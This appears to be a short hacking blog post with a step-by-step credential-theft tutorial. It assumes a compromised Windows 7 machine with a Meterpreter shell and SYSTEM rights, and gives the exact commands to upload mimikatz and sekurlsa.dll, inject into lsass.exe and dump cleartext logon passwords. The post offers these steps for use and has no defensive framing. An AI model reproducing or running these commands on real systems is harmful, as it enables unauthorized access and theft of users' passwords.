Step1:
Hack Win-7 and get the meterpreter shell. (As I demonstrated in the previous Post)
Step 2:
Now gain system level privileges (using sysret.exe method, as demonstrated in the previous Post)
Step 3
Type the following commands inside the meterpreter shell:
- upload <path of mimikatz.exe> c:\\
- upload <path of sekurlsa.dll> c:\\
Step 4:
- Get into windows command prompt by typing "shell" command
- Then get the mimikatz shell by typing "mimikatz" into the command prompt
*note: first navigate to the directory where mimikatz is uploaded.
Step 5:
Now type the following commands:
- privilege::debug
- inject::process lsass.exe sekurlsa.dll
- sekurlsa::logonPasswords full
After typing the third command you can view the clear text password on your screen :)
Comments
Post a Comment